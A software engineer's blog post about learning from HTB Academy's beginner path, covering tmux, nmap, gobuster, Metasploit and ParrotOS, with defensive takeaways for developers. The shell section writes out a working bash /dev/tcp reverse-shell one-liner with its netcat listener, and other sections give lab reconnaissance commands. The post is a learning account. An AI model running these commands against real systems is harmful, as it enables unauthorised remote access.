A Software Engineer’s First Steps into Hacking with HTB Academy
On the last weekend, I mentioned that previously I played with CTFs on picoCTF and hacked easy machines on HackTheBox. So, I decided to play with HackTheBox machines this weekend as well and found HTB Academy.
After registration, I was pleasantly surprised — cybersecurity skills were combined into paths with which everyone can start learning cybersecurity. It was awesome!
I started a basic free path called “Cracking into Hack the Box” on Saturday morning and I was learning this path during a couple of hours.
Even in such a short period of time, I learned a lot of things from hacker’s courses that I will use in my day job as a software engineer.
Tmux
Install and launch on Ubuntu:
sudo apt install tmux
tmuxIt provides the possibility to split one shell into a lot of other shells and switch between them.
Use case: connect to a remote machine with a single SSH session and switch between shells.
Previously, I always opened multiple SSH connections to the machine if I needed to do a couple of things simultaneously. Right now, I will use a more efficient way for the same task with tmux.
Shell on a remote machine
I never knew how hackers may create shells on remote machines. I always think that “creating a shell” means SSH-ing into the machine, but SSH is not the only choice to send commands to the machine.
youShells may be of different types:
- Reverse shell — when a remote shell connects to a local machine, and the local machine can send commands to it.
- Bind shell — when a remote machine listens for new shell connections, and a local machine may connect and execute commands on it.
- Web shell — when a remote machine executes shell commands via HTTP requests.
To start the first two shells, a hacker doesn’t even need any other tools except the default bash in Linux. Let’s see how to create a reverse shell:
- The hacker executes nc -lvnp 1234 on the local machine.
- The hacker executes bash -c ‘bash -i >& /dev/tcp/10.10.10.10/1234 0>&1’ on the remote machine, where 10.10.10.10 and 1234 are IP and port of the local machine from step 1.
That’s it — the hacker has a shell on a remote machine.
Use case: vulnerable software that allows commands execution, for example, throughout HTTP requests.
Previously, I had only heard about such types of exploitation, and now I will be more careful with developing my software to prevent it from this vulnerability.
Nmap
I was already familiar with Nmap previously, but these courses showed me that Nmap is a really powerful tool. For example, you can scan all ports and find the service versions that are running on the machine:
nmap -sV -sC -p- 10.129.42.253
Use case: exploration before an attack on the machine.
I didn’t gain a lot of new useful knowledge from using Nmap for my day job because I already know that ports should be closed with a firewall, and only ports where my services are working should accept traffic. The firewall should filter traffic from known networks, and services should be up to date.
Gobuster
Gobuster is an enumeration tool that can help explore website directories. For example:
gobuster dir -u http://10.129.203.156/nibbleblog/ --wordlist /usr/share/dirb/wordlists/common.txtThis command will try to find all directories from the provided wordlist in the “nibbleblog” directory.
Use case: exploration before an attack on the machine.
Consequences for me here are as follows:
I should be careful with endpoints that the application exposes to external clients because it’s not a big deal to expose management endpoints via misconfiguration and become a vulnerable target for hackers.
Metasploit
Metasploit is a great tool that automatically exploits vulnerabilities in software. I don’t have too much to say about it — you just need to keep your software always up-to-date because there are lots of exploits ready to use, which will make it possible for a script kiddie to hack a vulnerable system by simply typing commands in Metasploit.
Example of Metasploit usage:
- Start Metasploit: msfconsole
- Search for an exploit: search exploit <service_name>
- Use an exploit: use <exploit_name>
- Show options for the exploit: show options
- Set options for the exploit: set <option_name> <option_value>
- Exploit: exploit
That’s how a vulnerable target can be exploited with Metasploit. It’s pretty easy, and anyone can do it. I learned one important thing here:
All services and libraries should be up to date, otherwise, they will be hacked.
ParrotOS
ParrotOS is a Linux distribution based on Debian with installed tools for hacking. Also, HTB has its own distribution, which is very helpful during learning. Additionally, I want to mention that an OS for hacking should be installed in VirtualBox to protect myself.
I don’t have too much to say about this, just:
If I’m learning to hack, I will do it in VirtualBox.
Next Steps
I’m planning to continue exploring HTB Academy for myself in the evenings after my work and spending time with my family. At least 1 hour per day as a hobby where I can rest and learn something useful.
Also, I see how it’s different working of the brain during hacking compared to programming:
- In programming — you think about how to make a system work. Usually, one way to make the system work is enough, and the developer can switch to another task.
- In hacking — you think about how to break a system. It’s very hard to find a way to break a system at first glance, and you need to analyze different ways, collect a bunch of information, and then make a decision on how to break a system. It’s different work compared to programming because here, one way is not always effective.
These are very different approaches to thinking, and I believe that this will improve me in my day job because a broad view is always better than a view from one side.
I highly recommend checking academy.hackthebox.com for every software engineer who is interested in cybersecurity or has at least seen some movies like “Mr. Robot” or “Who Am I?”.
Stay tuned for more insights and tips on my journey through software engineering and cybersecurity — subscribe to keep learning with me.
